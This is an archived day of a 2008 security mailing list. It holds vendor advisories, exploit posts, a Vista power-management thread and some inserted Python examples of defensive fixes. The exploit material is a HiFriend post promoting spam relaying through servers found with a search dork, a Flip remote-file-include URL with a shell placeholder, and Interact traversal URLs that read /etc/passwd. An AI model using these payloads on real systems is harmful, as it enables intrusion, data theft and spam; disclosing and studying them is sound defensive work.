[ GLSA 200807-11 ] PeerCast: Buffer overflow

2008-07-21 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200807-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: PeerCast: Buffer overflow
      Date: July 21, 2008
      Bugs: #220281
        ID: 200807-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow vulnerability in PeerCast may allow for the remote
execution of arbitrary code.

Background
==========

PeerCast is a client and server for P2P-radio networks.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  media-sound/peercast      < 0.1218-r1                 >= 0.1218-r1

Description
===========

Nico Golde reported a boundary error in the HTTP::getAuthUserPass()
function when processing overly long HTTP Basic authentication
requests.

Impact
======

A remote attacker could send a specially crafted HTTP request to the
vulnerable server, possibly resulting in the remote execution of
arbitrary code with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All PeerCast users should upgrade to the latest version:

   # emerge --sync
   # emerge --ask --oneshot --verbose ">=media-sound/peercast-0.1218-r1"

References
==========

  [ 1 ] CVE-2008-2040
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2040

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-11.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIhOkGuhJ+ozIKI5gRAsPLAJ4pDU1p+l+VMNYTV9L3t4EJXpiNywCfQQX2
mm8f+HZSWkiBOofoc2b8tD0=
=6L/C
-END PGP SIGNATURE-


[ GLSA 200807-10 ] Bacula: Information disclosure

2008-07-21 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200807-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Bacula: Information disclosure
      Date: July 21, 2008
      Bugs: #196834
        ID: 200807-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in Bacula may allow local attackers to obtain sensitive
information.

Background
==========

Bacula is a network based backup suite.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  app-backup/bacula         < 2.4.1                         >= 2.4.1

Description
===========

Matthijs Kooijman reported that the "make_catalog_backup" script uses
the MySQL password as a command line argument when invoking other
programs.

Impact
======

A local attacker could list the processes on the machine while the script
is running and obtain the MySQL password. Note: the password could also
be disclosed via network sniffing when the script fails, in which case it
is sent via cleartext e-mail.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

A warning about this issue has been added in version 2.4.1, but the
issue is still unfixed. We advise not to use the make_catalog_backup
script, but to put all MySQL parameters into a dedicated file readable
only by the user running Bacula.

References
==========

  [ 1 ] CVE-2007-5626
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5626

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-10.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIhNCSuhJ+ozIKI5gRAh0rAJ0ZFhFvvbJqLAnQiCoYaOBoxEszWwCdH7Bz
YvVI1E8ezQdFC8viPEVUEvs=
=zejn
-END PGP SIGNATURE-
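The resolution in the Bacula advisory above is to move the MySQL credentials out of the command line and into a file readable only by the Bacula user. The following is an added example in Python (not Bacula's make_catalog_backup script and not Gentoo's code) showing why the original invocation leaks and how the option-file variant avoids it. The user name, database name and file path are assumptions made for the illustration.

```python
"""Added example (Python, not Bacula's own make_catalog_backup script).

The GLSA describes a password passed on the command line, where any
local user can read it from the process list (ps, /proc/<pid>/cmdline).
The recommended resolution is a MySQL option file readable only by the
user running Bacula. This shows the leaking argv next to the safe one and
writes the option file with mode 0600 from the moment it is created.
User, database and file names are assumptions for the illustration.
"""
import os
import stat
import tempfile


def unsafe_dump_argv(user, password, database):
    # The pattern the advisory warns about: the password is part of argv.
    return ["mysqldump", "--user=" + user, "--password=" + password, database]


def write_client_options(path, user, password):
    """Create a [client] option file that mysqldump can read.

    O_CREAT|O_EXCL with mode 0o600 means the file never exists with wider
    permissions, even briefly, and fails instead of clobbering an existing file.
    Double quotes and backslashes in the password are escaped for the
    option-file syntax.
    """
    escaped = password.replace("\\", "\\\\").replace('"', '\\"')
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write("[client]\n")
        fh.write("user=%s\n" % user)
        fh.write('password="%s"\n' % escaped)
    return path


def safe_dump_argv(options_file, database):
    # mysqldump takes user and password from the file; argv only shows the path.
    # --defaults-extra-file has to be the first option for the MySQL clients.
    return ["mysqldump", "--defaults-extra-file=" + options_file, database]


def leaks_password(argv, password):
    """What another local user would see with `ps -ef`."""
    return any(password in arg for arg in argv)


def demo(user="bacula", password='s3cret"pw', database="bacula"):
    """Build both command lines and report which one exposes the password."""
    path = os.path.join(tempfile.mkdtemp(), "bacula-mysql.cnf")
    write_client_options(path, user, password)
    mode = stat.S_IMODE(os.stat(path).st_mode)
    with open(path) as fh:
        content = fh.read()
    return {
        "unsafe_leaks": leaks_password(unsafe_dump_argv(user, password, database), password),
        "safe_leaks": leaks_password(safe_dump_argv(path, database), password),
        "mode": mode,
        "content": content,
    }


if __name__ == "__main__":
    print(demo())
```

The same idea applies to the e-mail failure path the advisory mentions: once the script no longer holds the password in a shell variable that gets echoed into the failure report, there is nothing for the cleartext mail to leak.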


E-Mail header Injection in HiFriend

2008-07-21 Thread Peter Wiesen


---Header Injection--


Script: hifriend.pl
Vendor: Hibyte
SoftwareVersion: The free one you get from many webpages
Dork: "hifriend.pl" + "cgi-bin"



---Infos---


This Exploit allows you to:

* send spam
* send fakemails
* E-Mail spoofing

With the Google dork, you find a lot of pages using HiFriend.
A lot of servers to send spam with.
Modify the source of the exploit to change the message, your
spoofed e-mail, and the receiver.

Oh, and you can send multiple mails!
Just put a comma behind a mail address.



--Exploit---


http://perforin.dark-codez.com/Perl-Scripts/hifriend-xploit.txt



-Visit & Greetings


www.DarK-CodeZ.com

Greetings to all my Friends ;)

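The flaw the post above relies on is e-mail header injection: a "tell a friend" CGI that copies form fields straight into mail headers lets a CR/LF in the recipient or subject field start a new header line, so the caller can add Bcc: recipients (or a blank line and a new body) and use the server as a relay. The following is an added example in Python, not part of the post and not the hifriend.pl script; the address values and the message layout are constructed for the illustration.

```python
"""Added example, not part of the HiFriend post or of hifriend.pl.

build_naive reproduces the flaw (header values concatenated straight into
the header block); build_safe refuses control characters and anything that
is not a single bare address. recipients() parses the result the way an
MTA would, so the smuggled Bcc: header becomes visible. All addresses are
constructed for this illustration.
"""
import re
from email import message_from_string
from email.utils import parseaddr

# No CR, LF, NUL, other C0 controls or DEL anywhere in a header value.
HEADER_VALUE_OK = re.compile(r"[^\x00-\x1f\x7f]*")


class HeaderInjection(ValueError):
    pass


def build_naive(to, subject, body, sender="webmaster@example.org"):
    """String concatenation straight into the header block: do not do this."""
    return "From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n%s\r\n" % (sender, to, subject, body)


def build_safe(to, subject, body, sender="webmaster@example.org"):
    """Validate each header value before it is allowed near a line ending."""
    for name, value in (("To", to), ("Subject", subject)):
        if not HEADER_VALUE_OK.fullmatch(value):
            raise HeaderInjection("control character in %s header" % name)
    # parseaddr returns only the first address; comparing it with the input
    # rejects the "a@example.com, b@example.com" trick from the post.
    addr = parseaddr(to)[1]
    if not addr or "@" not in addr or addr != to.strip():
        raise HeaderInjection("To must be exactly one bare address")
    return build_naive(to, subject, body, sender)


def recipients(raw_message):
    """Parse the message the way the MTA will and list every recipient header."""
    msg = message_from_string(raw_message)
    found = []
    for header in ("To", "Cc", "Bcc"):
        found.extend(msg.get_all(header, []))
    return found


# Constructed attacker input: the CRLF smuggles a second recipient header.
INJECTED_TO = "victim@example.com\r\nBcc: spam1@example.net, spam2@example.net"

if __name__ == "__main__":
    print(recipients(build_naive(INJECTED_TO, "hi", "look at this")))
    try:
        build_safe(INJECTED_TO, "hi", "look at this")
    except HeaderInjection as exc:
        print("rejected:", exc)
```

Rejecting rather than stripping control characters is deliberate: silently removing the CR/LF would still let "a@example.com, b@example.com" through, which is exactly the multi-recipient behaviour the post advertises.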

[SECURITY] [DSA 1612-1] New ruby1.8 packages fix several vulnerabilities

2008-07-21 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA-1612-1                  [EMAIL PROTECTED]
http://www.debian.org/security/                          Moritz Muehlenhoff
July 21, 2008                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package: ruby1.8
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2008-2662 CVE-2008-2663 CVE-2008-2664 CVE-2008-2725 
CVE-2008-2726 CVE-2008-2376

Several vulnerabilities have been discovered in the interpreter for
the Ruby language, which may lead to denial of service or the
execution of arbitrary code. The Common Vulnerabilities and Exposures
project identifies the following problems:

CVE-2008-2662

Drew Yao discovered that multiple integer overflows in the string
processing code may lead to denial of service and potentially the
execution of arbitrary code.

CVE-2008-2663

Drew Yao discovered that multiple integer overflows in the string
processing code may lead to denial of service and potentially the
execution of arbitrary code.

CVE-2008-2664

Drew Yao discovered that a programming error in the string
processing code may lead to denial of service and potentially the
execution of arbitrary code.

CVE-2008-2725

Drew Yao discovered that an integer overflow in the array handling
code may lead to denial of service and potentially the execution
of arbitrary code.

CVE-2008-2726

Drew Yao discovered that an integer overflow in the array handling
code may lead to denial of service and potentially the execution
of arbitrary code.

CVE-2008-2376

It was discovered that an integer overflow in the array handling
code may lead to denial of service and potentially the execution
of arbitrary code.

For the stable distribution (etch), these problems have been fixed in
version 1.8.5-4etch2.

For the unstable distribution (sid), these problems have been fixed in
version 1.8.7.22-2.

We recommend that you upgrade your ruby1.8 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for amd64, arm, hppa, i386, ia64, mipsel, s390 and 
sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz
Size/MD5 checksum:  4434227 aae9676332fcdd52f66c3d99b289878f
  
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch2.diff.gz
Size/MD5 checksum:   100878 f55f4e2a0ca298d6312a8e3c4618da0f
  
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch2.dsc
Size/MD5 checksum: 1079 02286e0f1885c65a9d1fdad5bd933ac7

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch2_all.deb
Size/MD5 checksum:   309932 0d08bd3d9b467f82df59811dcb4ffd10
  
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch2_all.deb
Size/MD5 checksum:   209874 76ab42ff282540121b1ffa23b8c34208
  
http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch2_all.deb
Size/MD5 checksum:   235238 d1f242b11d00199ecedf64cac2c6ac44
  
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch2_all.deb
Size/MD5 checksum:   242330 11359f9774006c02ca68402b1a6c021e
  
http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch2_all.deb
Size/MD5 checksum:  1228716 cacd1dfc0b53e163adf3090175d85260

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch2_amd64.deb
Size/MD5 checksum:   302500 42fb912eed252ddf0c0e0d1ded838375
  
http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch2_amd64.deb
Size/MD5 checksum:   197696 9388576f466a8d757a261653be326a64
  
http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch2_amd64.deb
Size/MD5 checksum:   198304 6dd9e7ffc83e0a343acc5d9360233724
  
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch2_amd64.deb
Size/MD5 checksum:  1584450 7bfff8f2effc86fefd21cad2ad7aefe2
  
http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch2_amd64.deb
Size/MD5 checksum:   197264 34559ddb2772bd4e4b4e9438da43b012
  
http://security.debian.org/pool/updates/main/r/ruby1.8/librub

[White Paper] Abusing HTML 5 Structured Client-side Storage

2008-07-21 Thread Alberto Trivero
The aim of this white paper is to analyze the security implications of the
new HTML 5 client-side storage technology, showing how different attacks
can be conducted in order to steal storage data on the client's machine.

Download at: http://trivero.secdiscover.com/html5whitepaper.pdf

Greetings,

Alberto Trivero



Re: SchoolCenter URL Handling Cross Site Scripting Vulnerability

2008-07-21 Thread Tester
Is there a patch for this hole?


Flip V3.0 final

2008-07-21 Thread Cru3l . b0y
###############################################################
##                 DeltaHackingSecurityTEAM                  ##
###############################################################
## Remote File Include Vulnerability
##
## Flip V3.0 final
##
## Download :
## http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/f/fl/flipsource/Flip-3.0-final.zip
###############################################################
## AuTh0r : Cru3l.b0y
## H0ME   : WwW.DeltaHacking.Net  &&  WwW.w3bsecurity.IR
## Email  : [EMAIL PROTECTED]
###############################################################
## Exploit:
##
##  www.Target.com/config.php?incpath=[SHELL]
###############################################################
SpeciaL GreeTz :

 :: Dr.Trojan :: All member in DeltaHacking.Net
###############################################################


Re: Pwnie Awards 2008

2008-07-21 Thread David Litchfield
Hey Alexandr,
I see I'm invited to award Brett his pwnie for his SQL flaw if he wins. I'd
be more than happy to - after all one bug over 3 years means someone did a
really good job ;)
Cheers,
David

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
4BF with Company Number 04225835 and VAT Number 783096402


[DSECRG-08-031] Local File Include Vulnerability in Interact 2.4.1

2008-07-21 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-31


Application:Interact E-Learning System  
Versions Affected:  2.4.1
Vendor URL: http://sourceforge.net/projects/cce-interact
Bug:Local File Include
Exploits:   YES
Reported:   03.07.2008
Vendor response:04.07.2008
Solution:   YES
Date of Public Advisory:21.07.2008
Authors:Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***********

The Interact E-Learning System has a local file include vulnerability in
the script help/help.php.

Vulnerable GET parameters: "module", "file".

Code
****

#####################################################################

$module = isset($_GET['module']) ? $_GET['module']:'';
$file   = isset($_GET['file']) ? $_GET['file']:'';

...

$hpath=$CONFIG['BASE_PATH'].'/language/'.$_SESSION['language'].'/help/'.$module.'/'.$file;
if (is_file($hpath)){
    require_once($hpath);
} else {
    require_once($CONFIG['BASE_PATH'].'/language/default/help/'.$module.'/'.$file);
}

#####################################################################

Example:

http://[server]/[installdir]/help/help.php?module=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/help/help.php?file=../../../../../../../../../../../../../etc/passwd



Solution
********

This file is no longer required by the system. Remove it from installation.

Vendor response:
 
"I have posted an alert to users to remove this from their installations asap 
and will get it removed from the next release of the package."



About
*

Digital Security is a leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.


Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
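The help.php code in the DSecRG advisory above concatenates the module and file parameters into a path for require_once, so "../" walks out of the help tree and a %00 byte cuts the path short. The following is an added example in Python (not Interact's PHP and not DSecRG's code) of the same lookup done safely: the language directory is tried first and the default one second, as in the original, but each component is checked and the resolved path must stay below the help root. The directory layout built by make_fixture and the language and module names are assumptions for the illustration.

```python
"""Added example in Python, not code from Interact.

resolve_help_file mirrors help.php's lookup but rejects NUL bytes,
separators and dot components, then resolves the candidate and checks it
is still below the help root. The directory layout built by make_fixture
is constructed for this illustration.
"""
import os
import tempfile


class HelpPathError(ValueError):
    pass


def _component(value):
    """A single directory or file name: no NUL, no separator, not . or .."""
    if not value or value in (".", "..") or any(c in value for c in "\x00/\\"):
        raise HelpPathError("bad path component: %r" % value)
    return value


def resolve_help_file(base_path, language, module, file):
    """Return the real path of the help page or raise HelpPathError."""
    root = os.path.realpath(os.path.join(base_path, "language"))
    language, module, file = (_component(v) for v in (language, module, file))
    for lang in (language, "default"):
        real = os.path.realpath(os.path.join(root, lang, "help", module, file))
        # realpath follows symlinks, so a planted link cannot escape either;
        # commonpath (not startswith) avoids the /srv/language-old prefix trick.
        if os.path.commonpath([root, real]) != root:
            raise HelpPathError("path escapes the help root")
        if os.path.isfile(real):
            return real
    raise HelpPathError("no such help page")


def make_fixture():
    """Build a throwaway tree: an English page, a default-only page, a secret."""
    base = tempfile.mkdtemp()
    for lang, module, name in (("en", "forum", "index.php"), ("default", "forum", "intro.php")):
        d = os.path.join(base, "language", lang, "help", module)
        os.makedirs(d)
        with open(os.path.join(d, name), "w") as fh:
            fh.write("<?php echo 'help'; ?>\n")
    with open(os.path.join(base, "secret.txt"), "w") as fh:
        fh.write("db password\n")
    return base


if __name__ == "__main__":
    base = make_fixture()
    print(resolve_help_file(base, "en", "forum", "index.php"))
    print(resolve_help_file(base, "en", "forum", "intro.php"))  # default fallback
    for module, file in (("../../../../../../etc/passwd\x00", "x"), ("forum", "../../../../secret.txt")):
        try:
            resolve_help_file(base, "en", module, file)
        except HelpPathError as exc:
            print("rejected:", exc)
```

The component check is what blocks both advisory URLs; the root check is the backstop for anything the component check does not anticipate, such as a symlink inside the help tree.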





FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 NULL-Pointer reference Denial of Service Vulnerability

2008-07-21 Thread zhliu
FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 NULL-Pointer
reference Denial of Service Vulnerability
http://www.fortiguardcenter.com/advisory/FGA-2008-16.html
July 20, 2008

-- Affected Vendors:
EMC

-- Affected Products:
EMC Dantz Retrospect 7 backup Client 7.5.116

-- Vulnerability Details:

A vulnerability exists in EMC's Retrospect Client 7.5.116 which allows
remote attackers to cause a read access violation (client termination and
loss of backup service) via malformed packets to TCP port 497, which
trigger an assert error. The root cause is a programming error by EMC
Dantz: a NULL pointer is dereferenced by mistake.

-- Vendor Response:
EMC has issued an update to correct this vulnerability:

http://www.emcinsignia.com/updates

-- Disclosure Timeline:
2008-04-20 - Vulnerability reported to vendor
2008-06-30 - Vendor issued update
2008-07-20 - Coordinated public release of advisory

Acknowledgment:

Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team


Disclaimer:

Although Fortinet has attempted to provide accurate information in these
materials, Fortinet assumes no legal responsibility for the accuracy or
completeness of the information. More specific information is available on
request from Fortinet. Please note that Fortinet's product information
does not constitute or contain any guarantee, warranty or legally binding
representation, unless expressly identified as such in a duly signed
writing.

About Fortinet ( www.fortinet.com ):

Fortinet is the pioneer and leading provider of ASIC-accelerated unified
threat management, or UTM, security systems, which are used by enterprises
and service providers to increase their security while reducing total
operating costs. Fortinet solutions were built from the ground up to
integrate multiple levels of security protection--including firewall,
antivirus, intrusion prevention, VPN, spyware prevention and anti-spam --
designed to help customers protect against network and content level
threats. Leveraging a custom ASIC and unified interface, Fortinet
solutions offer advanced security functionality that scales from remote
office to chassis-based solutions with integrated management and
reporting. Fortinet solutions have won multiple awards around the world
and are the only security products that are certified in six programs by
ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and
Anti-Spyware). Fortinet is privately held and based in Sunnyvale,
California.



Vim: Improper Implementation of shellescape()/Arbitrary Code Execution

2008-07-21 Thread Jan Minář
1. Summary

Product  : Vim -- Vi IMproved
Version  : >= 7.2a.013; tested with 7.2b
Impact   : Arbitrary code execution
Wherefrom: Local, possibly remote
Original : http://www.rdancer.org/vulnerablevim-shellescape.html
   http://www.rdancer.org/vulnerablevim-latest.tar.bz2

Improper implementation of the shellescape() function and lack of
documentation can result in untrusted data being insufficiently
sanitized, possibly leading to arbitrary code execution.


2. Background

The shellescape() function, added by patch 7.0.111, has since been
modified in 7.2a.013 to escape special characters, so as to be useful
when sanitizing arguments of the ``execute'' command:


``shellescape({string} [, {special}])
Escape {string} for use as shell command argument.
[...]
When the {special} argument is present and it's a non-zero Number or
a non-empty String [...], then special items such as "%", "#" and
"<cword>" will be preceded by a backslash.  This backslash will be
removed again by the :! command.  Example of use with a :! command:
:exe '!dir ' . shellescape(expand('<cfile>'), 1)
This results in a directory listing for the file under the cursor.''

-- Vim Reference Manual (``eval.txt'')


3. Vulnerability

shellescape() does not escape all special items.  In particular,
shellescape() does not escape the ``!'' character.

The Vim documentation lacks a comprehensive explicit list of special
items.  This might have been the reason why patch 7.2a.013 failed to
acknowledge ``!'' as a special item.


4. Test Case

We have added a test case to our test suite; run ``make test'' in the
``shellescape'' directory.  The result will show as ``VULNERABLE'' if
the shellescape() function of the version of Vim tested doesn't escape
the ``!'' special item, ``FAILED'' otherwise.


5. Exploit -- Proof of Concept

To show that this vulnerability can be exploited, we have updated our
``tar.vim'' exploit.   Run ``make test'' in the ``tarplugin.v2''
directory.  Please note that the problem lies within the shellescape()
function implementation, rather than within ``tar.vim''.


6. Test Results

------------------------------------------------------------
 Test results below
------------------------------------------------------------
Vim version 7.2b
------------------------------------------------------------
tarplugin.v2: VULNERABLE
shellescape:  VULNERABLE

(Tests for vulnerabilities that are part of the accompanying test suite
but are not mentioned in this advisory are omitted from this table.)


7. Copyright

This advisory is Copyright 2008 Jan Minar <[EMAIL PROTECTED]>

Copying welcome, under the Creative Commons ``Attribution-Share Alike''
License http://creativecommons.org/licenses/by-sa/2.0/uk/

Code included herein, and accompanying this advisory, may be copied
according to the GNU General Public License version 2, or the Vim
license.  See the subdirectory ``licenses''.

Various portions of the accompanying code were written by various
parties.  Those parties may hold copyright, and those portions may be
copied according to the respective licenses.


8. History

2008-07-16 Sent to: <[EMAIL PROTECTED]> -- This is the correct address, not
   <[EMAIL PROTECTED]>
2008-07-16 Sent to: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>,
   <[EMAIL PROTECTED]>, 


RE: Windows Vista Power Management & Local Security Policy

2008-07-21 Thread Abe Getchell
I understand all of that, which is precisely the reason I put it out there.
The example I put forth might have been a bad one (given that it relies on
an additional piece of code to be installed on a target machine), but
there's probably more to this issue than I can deduce. I'll let those more
versed in that area of security figure it out. As a side note, check out
some of the conversations on the Linux Kernel mailing list about power
management and security. Interesting stuff.

--
Abe Getchell
[EMAIL PROTECTED]
https://abegetchell.com/

> -Original Message-
> From: Jim Harrison [mailto:[EMAIL PROTECTED]
> Sent: Sunday, July 20, 2008 4:33 PM
> To: '[EMAIL PROTECTED]'; 'Thor (Hammer of God)'; 'Johan Beisser'
> Cc: bugtraq@securityfocus.com
> Subject: RE: Windows Vista Power Management & Local Security Policy
> 
> It's about reality & priorities.
> 
> What we're both saying is:
> 1. it's a bug and should be fixed in accordance with its impact on real
> (not imagined) functionality & security
> 2. unless this provides some exploit that doesn't start with "if I can
> install software on the host", it's not more than "a bug in a security
> mechanism"
> 
> If someone can demonstrate an actual vulnerability or exploit on the
> basis of this bug _alone_, then they may have something to make noise
> about.  There are enough real bugs and security vulns in software to
> deal with.  Not every security issue spells doom and damnation or
> warrants immediate corrective response from the vendor.
> 
> Jim
> 
> -Original Message-
> From: Abe Getchell [mailto:[EMAIL PROTECTED]
> Sent: Sunday, July 20, 2008 12:32 PM
> To: 'Thor (Hammer of God)'; Jim Harrison; 'Johan Beisser'
> Cc: bugtraq@securityfocus.com
> Subject: RE: Windows Vista Power Management & Local Security Policy
> 
> So, you guys don't think it's an issue that power management in Vista
> (apparently) has a pass to bypass local security policy?
> 
> --
> Abe Getchell
> [EMAIL PROTECTED]
> https://abegetchell.com/
> 
> > -Original Message-
> > From: Thor (Hammer of God) [mailto:[EMAIL PROTECTED]
> > Sent: Saturday, July 19, 2008 6:20 PM
> > To: [EMAIL PROTECTED]; Jim Harrison; bugtraq@securityfocus.com
> > Subject: RE: Windows Vista Power Management & Local Security Policy
> >
> > If Jim is going to get Nancy to run a program, and that's "not all that
> > hard," then why not just have that program do what you want in the first
> > place rather than worrying about the power switch nonsense?  This is the
> > one million and fourth time:  "If your 'vulnerability' begins with 'if I
> > can get the user to run code' then whatever comes after the 'then'
> > doesn't matter.  Period."
> >
> > t
> >
> >
> >
> > > -Original Message-
> > > From: Abe Getchell [mailto:[EMAIL PROTECTED]
> > > Sent: Saturday, July 19, 2008 12:33 AM
> > > To: 'Jim Harrison'; bugtraq@securityfocus.com
> > > Subject: RE: Windows Vista Power Management & Local Security Policy
> > >
> > > As stated in my original e-mail to the list, I definitely don't think
> > > that this is a security vulnerability in a traditional sense. I
> > > completely agree with you. Think about it this way... When you press
> > > the power button on the machine and it performs a graceful shutdown,
> > > stuff happens inside of the operating system. That stuff happens at an
> > > elevated privilege level. If there were some way to hook into the stuff
> > > that happens, you (as an unauthenticated user), could do bad things
> > > (besides simply shutting down the system) using that hook simply by
> > > pressing the power button at the logon screen. For example, if Jim
> > > wants to know what Nancy is working on, he could write a program which
> > > e-mails him the contents of her "My Documents" folder that is triggered
> > > by a hook into that process. All Jim needs to do is get Nancy to run
> > > that program on her system (not hard) and walk by her office when she's
> > > not there and hit the power button (also not hard). So what can _I_ do
> > > with this bug? Not much, I'm not that great of a programmer... but I
> > > think someone out there could do some nasty stuff.
> > >
> > > --
> > > Abe Getchell
> > > [EMAIL PROTECTED]
> > > https://abegetchell.com/
> > >
> > >
> > > > -Original Message-
> > > > From: Jim Harrison [mailto:[EMAIL PROTECTED]
> > > > Sent: Saturday, July 19, 2008 1:36 AM
> > > > To: '[EMAIL PROTECTED]'; bugtraq@securityfocus.com
> > > > Subject: RE: Windows Vista Power Management & Local Security
> Policy
> > > >
> > > > Abe,
> > > >
> > > > Other than a denial-of-service from the console (is the power switch
> > > > now a security vuln, too?), what can you do with this bug?  It's
> > > > absolutely, unquestionably a "bug"; the user should see behavior as
> > > > dictated by logic and described in the documentation, but a "security

RE: Windows Vista Power Management & Local Security Policy

2008-07-21 Thread Jim Harrison
It's about reality & priorities.

What we're both saying is:
1. it's a bug and should be fixed in accordance with its impact on real (not 
imagined) functionality & security
2. unless this provides some exploit that doesn't start with "if I can install 
software on the host", it's not more than "a bug in a security mechanism"

If someone can demonstrate an actual vulnerability or exploit on the basis of 
this bug _alone_, then they may have something to make noise about.  There are 
enough real bugs and security vulns in software to deal with.  Not every 
security issue spells doom and damnation or warrants immediate corrective 
response from the vendor.

Jim

-Original Message-
From: Abe Getchell [mailto:[EMAIL PROTECTED]
Sent: Sunday, July 20, 2008 12:32 PM
To: 'Thor (Hammer of God)'; Jim Harrison; 'Johan Beisser'
Cc: bugtraq@securityfocus.com
Subject: RE: Windows Vista Power Management & Local Security Policy

So, you guys don't think it's an issue that power management in Vista
(apparently) has a pass to bypass local security policy?

--
Abe Getchell
[EMAIL PROTECTED]
https://abegetchell.com/

> -Original Message-
> From: Thor (Hammer of God) [mailto:[EMAIL PROTECTED]
> Sent: Saturday, July 19, 2008 6:20 PM
